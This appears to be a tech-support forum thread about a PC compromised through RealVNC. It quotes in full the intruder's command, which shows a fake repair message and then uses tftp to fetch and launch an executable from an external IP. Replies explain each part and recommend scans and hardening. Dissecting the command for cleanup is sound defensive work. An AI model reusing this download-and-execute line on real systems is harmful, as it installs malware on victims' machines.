• Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 310
  • Last Modified:

What is this cmdline attempting to do ?

Hi,

We recently had a PC hacked via Real VNC. The Hacker executed the following command line.

%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 81.88.110.178 GET cffhvvct.exe & start cffhvvct&

Can anyone explain what this has done ?

Regards

Rob
0
ertnev74
Asked:
ertnev74
5 Solutions
 
Richard QuadlingSenior Software DeverloperCommented:
%comspec%

This is telling the computer to run the command shell as identified by %COMSPEC%

At the dos prompt type SET and enter and you will see COMSPEC.
Normally cmd.exe or (older windows) command.com


/c

Tells the comspec to run a command and then quit.


echo Repairing user32.dll

Output to the screen.

&
echo Please wait...

output to the screen.



tftp -i 81.88.110.178 GET cffhvvct.exe

Use the program tftp to get a file called cffhvvct.exe from the IP address of 81.88.110.178


start cffhvvct

Run the program just downloaded.




If you don't know the name of the program or the FTP site, don't run it.

I've just tried downloading the file from that site but it timedout.

If it was a virus, then the site may have been blocked or something else.
0
 
kamleshgwalaniCommented:
Dear ertnev74,

Few weeks ago I got the same issue via VNC, it basically tries to dump 1.exe or 2.exe which is trojen. Basically search computer for virus and try to search 1.exe

U can manually end the process and renamed it and later delete it

Run the good antivirus softwares like Window Live Care or E-Wido

Read some more info
http://en.wikipedia.org/wiki/ComSpec
http://www.liutilities.com/products/wintaskspro/processlibrary/1/
0
 
Richard QuadlingSenior Software DeverloperCommented:
OK. Having read the question again.

Without having access to the program itself, absolutely ANYTHING could have happened.

I would STRONGLY recommend disconnecting the pc from the lan and running virus scanners and rootkit scanners.

SystemInternals Process Explorer (to see what is currently running and make sure YOU know it should be running).
SystemInternals RootKitRevealer (to see if any root kits exist).
SystemInternals AutoRuns (to see what is launched when the computer is turned on or when you login).
HijackThis is a similar program to AutoRuns, but produces a report which others can look at (http://www.spywareinfo.com/~merijn/programs.php)
0
VIDEO: THE CONCERTO CLOUD FOR HEALTHCARE

Modern healthcare requires a modern cloud. View this brief video to understand how the Concerto Cloud for Healthcare can help your organization.

 
rpggamergirlCommented:
You could also try running some free scanners.
SUPERAntispyware:
http://www.superantispyware.com/

Download and install DrWebCureIt
http://www.freedrweb.com/

AVG Antispyware,
http://free.grisoft.com/doc/download-free-anti-spyware/us/frt/0


OR, run Combofix and upload the log for us to check.
Download ComboFix to your Desktop, from either of these locations:
http://www.techsupportforum.com/sectools/sUBs/ComboFix.exe
http://download.bleepingcomputer.com/sUBs/ComboFix.exe

Double click "combofix.exe" and follow the prompts.
When finished, it shall produce a log for you.
Upload the log at EE-Stuff.com for us to check please.
0
 
kamleshgwalaniCommented:
Sorry forgot to mentioned, always make sure that your firewall is turned on.
Or VNC Should be only enable as and when required.
If you can change the default port i.e. 5900 to some other ports would be helpful too, as this port is well known by hackers, so they just scan the port and enter into it.
I need this same thing with our guys and it solved my problem.

Now since the program has been executed on your machine, so better virus/spyware/trojen scan and then do the needful as above.
0
 
kamleshgwalaniCommented:
So what the problem? Were you able to find out 1.exe ?
0
 
ertnev74Author Commented:
All, thanks for you assistance with this query.

The user saw some activity on his screen last Thursday around midday. I advised him to shut off his router. When I got to his PC he explained what he had seen. Clicking on Start > Run I found the above cmdline.  

I looked up 'VNC being hacked' on EE and found a few solutions to recitify the situation. Once I made the box secure running Spyware / AV / Process Scanners I then looked at the cause and possible damage.
The cmdline was the only thing I didn't understand.... but I do now :)

The AV Scan removed a few trojans and viruses so I'm not to sure if 1.exe was on the box, however I was able to trace the IP of the hacker back to America.

Thanks again.
0
 
kamleshgwalaniCommented:
Thanks for the valuable feedback. The best is to make your windows firewall ON and keeps on Windows Patched !!!!
0

Featured Post

What does it mean to be "Always On"?

Is your cloud always on? With an Always On cloud you won't have to worry about downtime for maintenance or software application code updates, ensuring that your bottom line isn't affected.

Tackle projects and never again get stuck behind a technical roadblock.
Join Now